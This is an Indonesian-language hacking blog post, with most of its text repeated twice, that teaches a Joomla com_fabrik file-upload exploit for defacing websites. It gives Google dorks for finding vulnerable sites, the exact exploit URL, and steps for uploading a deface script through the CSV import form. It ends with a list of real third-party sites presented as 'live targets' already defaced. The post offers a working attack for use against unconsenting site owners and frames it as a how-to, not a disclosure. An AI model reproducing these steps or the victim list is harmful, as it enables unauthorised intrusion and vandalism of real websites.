![[#] Cileungsi - Cyber [#]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk1HOYbqs6aHW6qDZavfqnTwQQG5kiNm084lssR1JtBxAO96qp7au32gDDgxzSaN2u01Tetbo6zQEFULg5ucp4AmguJCKaA1qIqrCH7OVYrNkYLvtC_XuHeMGzgDTCEfyvOgNu54JEQfM/s1600/flamingtext__25040060229699109.png)
Assalamualaikum .. ^_^ Kali ini saya cuma mau berbagi saja tentang Exploit Joomla. Ini sebenarnya bug lama, Namun ternyata sampai sekara...
Assalamualaikum .. ^_^
Kali ini saya cuma mau berbagi saja tentang Exploit Joomla.
Ini sebenarnya bug lama, Namun ternyata sampai sekarang masih ada saja situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam mencari target dan kepandaian mengolah google dork.
Sebelumnya sedikit Nasihat dari saya :
"Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Oke, langsung saja ^_^
Google Dork :
inurl:viewTable?cid= site:com
*Site boleh kamu ganti apa saja~ Contoh: ru /it /il /za /pl dll ^_^
Atau ~
index.php?option=com_fabrik [ dork dikreasikan sendiri.ya, pemalas gak bakalan sukses loh ^_^ ]
Setelah web dibuka, maka akan muncul "Sorry this form is not publish".
Kemudian kamu masukan exploit ini :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contoh : http://www.salvi.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Nah udah muncul tuh Bugnya :D
Jika sudah ~
Buka Hasil Deface-an Kamu dengan format : http://www.salvi.it/media/NamaScriptKamu.html
Taraa ~
Munculah Script Deface kesayangan kamu >.<
*Kalau Tidak muncul berarti web tersebut tidak mendukung format html maupun php atau bisa saja FF :v *
Live Target :
~ http://www.salvi.it/media/cileungsi.html
~ http://officewindowcleaning.org.uk/media/cileungsi.html
~ http://www.avespalencia.org/media/cileungsi.html
~ http://aperfectsuccess.com/media/cileungsi.html
~ http://userbase.be/media/cileungsi.html
~ http://blorey.ru/media/cileungsi.html
~ http://www.shieldec.co.za/media/cileungsi.html
~ http://www.upperstylepanama.com/media/cileungsi.html
~ http://www.newmoonofficialtour.com/media/cileungsi.html
Salam Nubi gan dari saya ^_^
Mr. DellatioNx196
Kali ini saya cuma mau berbagi saja tentang Exploit Joomla.
Ini sebenarnya bug lama, Namun ternyata sampai sekarang masih ada saja situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam mencari target dan kepandaian mengolah google dork.
Sebelumnya sedikit Nasihat dari saya :
"Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Oke, langsung saja ^_^
Google Dork :
inurl:viewTable?cid= site:com
*Site boleh kamu ganti apa saja~ Contoh: ru /it /il /za /pl dll ^_^
Atau ~
index.php?option=com_fabrik [ dork dikreasikan sendiri.ya, pemalas gak bakalan sukses loh ^_^ ]
Setelah web dibuka, maka akan muncul "Sorry this form is not publish".
Kemudian kamu masukan exploit ini :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contoh : http://www.salvi.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Nah udah muncul tuh Bugnya :D
Kalian tinggal Klik "Choose File" Terus pilih script deface kamu, dan Klik "Import CSV" Untuk Mengupload ~
Buka Hasil Deface-an Kamu dengan format : http://www.salvi.it/media/NamaScriptKamu.html
Taraa ~
Munculah Script Deface kesayangan kamu >.<
*Kalau Tidak muncul berarti web tersebut tidak mendukung format html maupun php atau bisa saja FF :v *
Live Target :
~ http://www.salvi.it/media/cileungsi.html
~ http://officewindowcleaning.org.uk/media/cileungsi.html
~ http://www.avespalencia.org/media/cileungsi.html
~ http://aperfectsuccess.com/media/cileungsi.html
~ http://userbase.be/media/cileungsi.html
~ http://blorey.ru/media/cileungsi.html
~ http://www.shieldec.co.za/media/cileungsi.html
~ http://www.upperstylepanama.com/media/cileungsi.html
~ http://www.newmoonofficialtour.com/media/cileungsi.html
Mr. DellatioNx196
Postingan
COMMENTS